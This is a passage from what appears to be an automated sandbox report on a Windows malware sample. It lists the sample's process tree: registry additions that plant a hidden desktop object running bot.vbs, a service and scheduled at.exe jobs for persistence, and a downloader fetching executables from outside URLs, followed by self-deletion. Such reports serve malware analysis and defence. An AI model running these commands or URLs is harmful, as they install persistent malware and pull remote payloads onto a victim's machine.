              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\Kingsoft\myfile\Microsoft\bot.vbs" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 3500

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)"
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 752

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command"
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 1156

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 4652

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder"
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 1184

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 536

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 1116

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 1412

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 4352

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /C .\fav\fav.cmd
          - Drops file in Program Files directory
          - System Location Discovery: System Language Discovery
          PID: 4136

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
          - System Location Discovery: System Language Discovery
          PID: 4448

            C:\Windows\SysWOW64\sc.exe
              Command line: sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
              - System Service Discovery
              PID: 2440

            C:\Windows\SysWOW64\sc.exe
              Command line: sc config Schedule start= auto
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
              PID: 1264

            C:\Windows\SysWOW64\net.exe
              Command line: net start "Task Scheduler"
              - System Location Discovery: System Language Discovery
              - System Service Discovery
              PID: 4828

                C:\Windows\SysWOW64\net1.exe
                  Command line: C:\Windows\system32\net1 start "Task Scheduler"
                  - System Location Discovery: System Language Discovery
                  - System Service Discovery
                  PID: 3616

            C:\Windows\SysWOW64\at.exe
              Command line: at 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
              - System Location Discovery: System Language Discovery
              PID: 2520

            C:\Windows\SysWOW64\at.exe
              Command line: at 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
              - System Location Discovery: System Language Discovery
              PID: 4996

            C:\Windows\SysWOW64\at.exe
              Command line: at 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
              - System Location Discovery: System Language Discovery
              PID: 2676

            C:\Windows\SysWOW64\at.exe
              Command line: at 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
              - System Location Discovery: System Language Discovery
              PID: 4696

            C:\Windows\SysWOW64\at.exe
              Command line: at 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
              - System Location Discovery: System Language Discovery
              PID: 2188

            C:\Windows\SysWOW64\at.exe
              Command line: at 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
              - System Location Discovery: System Language Discovery
              PID: 1772

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /C .\360.cmd
          - Drops file in Program Files directory
          - System Location Discovery: System Language Discovery
          PID: 2752

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
          - System Location Discovery: System Language Discovery
          PID: 5080

            C:\Program Files\Kingsoft\myfile\soft\msn.exe
              Command line: "C:\Program Files\Kingsoft\myfile\soft\msn.exe"
              - Checks computer location settings
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              PID: 4292

                C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
                  Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of SetWindowsHookEx
                  PID: 4884

                C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
                  Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://soft.downxiazai.info/soft/YoudaoDict_zhusha_quantui_001.exe"
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of SetWindowsHookEx
                  PID: 3800

                C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
                  Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://www.xunlei6x.com/msn/software/partner/1/chic7.exe"
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of SetWindowsHookEx
                  PID: 4108

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
          - System Location Discovery: System Language Discovery
          PID: 2884
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- Hide Artifacts (2)
  - Hidden Files and Directories (2)
- Indicator Removal (1)
  - File Deletion (1)
- Modify Registry (1)
Downloads